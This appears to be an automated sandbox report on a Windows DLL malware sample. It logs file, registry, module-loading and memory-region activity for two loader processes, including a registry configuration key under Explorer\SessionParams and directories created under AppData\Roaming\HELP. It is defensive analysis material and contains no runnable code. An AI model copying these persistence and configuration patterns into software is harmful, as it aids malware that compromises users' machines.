| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98967 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #67: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #67 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DB4
0x
DBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x0110ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0133ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013a0000 | 0x013a0000 | 0x013affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x014cffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99076 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #68: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #68 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe80 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
